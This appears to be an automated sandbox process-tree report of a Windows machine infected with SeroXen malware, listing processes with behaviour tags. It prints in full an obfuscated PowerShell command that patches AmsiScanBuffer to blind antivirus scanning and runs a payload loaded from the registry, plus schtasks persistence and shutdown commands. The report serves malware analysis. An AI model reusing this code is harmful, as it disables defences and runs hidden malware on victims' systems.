C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XcYsDxLQBeYl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IidXlbXYKVVsBC,[Parameter(Position=1)][Type]$VhtqYvUdan)$QXFOseKlOpE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'l'+'e'+''+'c'+'t'+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+[Char](111)+'r'+'y'+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$QXFOseKlOpE.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+'i'+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$IidXlbXYKVVsBC).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+'ed');$QXFOseKlOpE.DefineMethod(''+[Char](73)+''+'n'+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+','+[Char](86)+'ir'+[Char](116)+''+[Char](117)+'al',$VhtqYvUdan,$IidXlbXYKVVsBC).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+'a'+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $QXFOseKlOpE.CreateType();}$OuZbrRNzqqDCZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+''+[Char](116)+''+'i'+'v'+'e'+''+[Char](77)+''+[Char](101)+''+'t'+'hod'+[Char](115)+'');$HyfChpUXlsnWal=$OuZbrRNzqqDCZ.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$pUFQTdKLpJYmvQXqQWv=XcYsDxLQBeYl @([String])([IntPtr]);$PJrlEexUbUYomGkOnoEkcu=XcYsDxLQBeYl @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LulGeunhQQY=$OuZbrRNzqqDCZ.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+'er'+[Char](110)+'e'+[Char](108)+''+'3'+''+'2'+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$iXoKbmVBJAYyAt=$HyfChpUXlsnWal.Invoke($Null,@([Object]$LulGeunhQQY,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+'y'+''+[Char](65)+'')));$XmVlCnWMtxuWdghND=$HyfChpUXlsnWal.Invoke($Null,@([Object]$LulGeunhQQY,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'al'+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+'c'+''+[Char](116)+'')));$laBETWg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iXoKbmVBJAYyAt,$pUFQTdKLpJYmvQXqQWv).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$WcxNHZPSifpeXndwh=$HyfChpUXlsnWal.Invoke($Null,@([Object]$laBETWg,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$NKNNSpBFNv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XmVlCnWMtxuWdghND,$PJrlEexUbUYomGkOnoEkcu).Invoke($WcxNHZPSifpeXndwh,[uint32]8,4,[ref]$NKNNSpBFNv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WcxNHZPSifpeXndwh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XmVlCnWMtxuWdghND,$PJrlEexUbUYomGkOnoEkcu).Invoke($WcxNHZPSifpeXndwh,[uint32]8,0x20,[ref]$NKNNSpBFNv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+'E').GetValue('$7'+[Char](55)+''+'s'+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UVeALKuDRAVR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qaoWtzYXpzqHng,[Parameter(Position=1)][Type]$yCIlQBVIjA)$hEswdpoJNiL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+'l'+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+'e'+'','C'+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+'ea'+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+''+'o'+''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$hEswdpoJNiL.DefineConstructor(''+'R'+''+[Char](84)+'S'+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+',H'+[Char](105)+'d'+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+'u'+'b'+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qaoWtzYXpzqHng).SetImplementationFlags('R'+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+''+'g'+''+'e'+''+[Char](100)+'');$hEswdpoJNiL.DefineMethod(''+'I'+''+[Char](110)+''+'v'+'oke',''+[Char](80)+'ub'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'Ne'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+','+'V'+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$yCIlQBVIjA,$qaoWtzYXpzqHng).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+'e'+'d'+'');Write-Output $hEswdpoJNiL.CreateType();}$hVMOSpZrJXisI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cr'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+'s');$BdXbdKcOgvdBlr=$hVMOSpZrJXisI.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'dres'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VHUBBdfHLwZbKWQBQGB=UVeALKuDRAVR @([String])([IntPtr]);$xbkHFfswgXaquqRlsBPkjO=UVeALKuDRAVR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ujJviMUXHvn=$hVMOSpZrJXisI.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$PBqwDtrmgmTpkH=$BdXbdKcOgvdBlr.Invoke($Null,@([Object]$ujJviMUXHvn,[Object]('L'+[Char](111)+''+[Char](97)+'dL'+'i'+''+'b'+'ra'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$cqOevFbaloYYogFki=$BdXbdKcOgvdBlr.Invoke($Null,@([Object]$ujJviMUXHvn,[Object](''+'V'+'i'+'r'+'t'+[Char](117)+''+[Char](97)+'lP'+'r'+''+'o'+'te'+[Char](99)+''+[Char](116)+'')));$lHjVnAX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PBqwDtrmgmTpkH,$VHUBBdfHLwZbKWQBQGB).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+'d'+''+[Char](108)+'l');$neGCZolwbtzOLDSKj=$BdXbdKcOgvdBlr.Invoke($Null,@([Object]$lHjVnAX,[Object](''+'A'+'m'+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$NPWkNakPpX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cqOevFbaloYYogFki,$xbkHFfswgXaquqRlsBPkjO).Invoke($neGCZolwbtzOLDSKj,[uint32]8,4,[ref]$NPWkNakPpX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$neGCZolwbtzOLDSKj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cqOevFbaloYYogFki,$xbkHFfswgXaquqRlsBPkjO).Invoke($neGCZolwbtzOLDSKj,[uint32]8,0x20,[ref]$NPWkNakPpX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1396

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2280

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1876

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004CC
2⤵
PID:4412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1724

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2312

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2624

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2772

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3124

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3264

C:\Users\Admin\AppData\Local\Temp\Uni.exe
"C:\Users\Admin\AppData\Local\Temp\Uni.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:3932

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4116

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:3372

C:\Users\Admin\AppData\Local\Temp\XdYRHiNDnO3c.exe
"C:\Users\Admin\AppData\Local\Temp\XdYRHiNDnO3c.exe"
4⤵
- Executes dropped EXE
PID:2104

C:\Users\Admin\AppData\Local\Temp\rg3SxrWLFAjq.exe
"C:\Users\Admin\AppData\Local\Temp\rg3SxrWLFAjq.exe"
4⤵
- Executes dropped EXE
PID:6000

C:\Windows\SysWOW64\shutdown.exe
"C:\Windows\System32\shutdown.exe" /s /t 0
4⤵
PID:5852

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:4444

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff8d4743cb8,0x7ff8d4743cc8,0x7ff8d4743cd8
3⤵
PID:3056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
3⤵
PID:1484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
3⤵
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
3⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
3⤵
PID:4920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
3⤵
PID:4556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
3⤵
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
3⤵
PID:740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 /prefetch:8
3⤵
PID:1176

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
3⤵
PID:3732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
3⤵
PID:972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
3⤵
PID:5204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
3⤵
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4992 /prefetch:8
3⤵
PID:5768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:8
3⤵
PID:6116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,8171742079236160658,14816359661465899396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
3⤵
PID:5884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3496

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3828
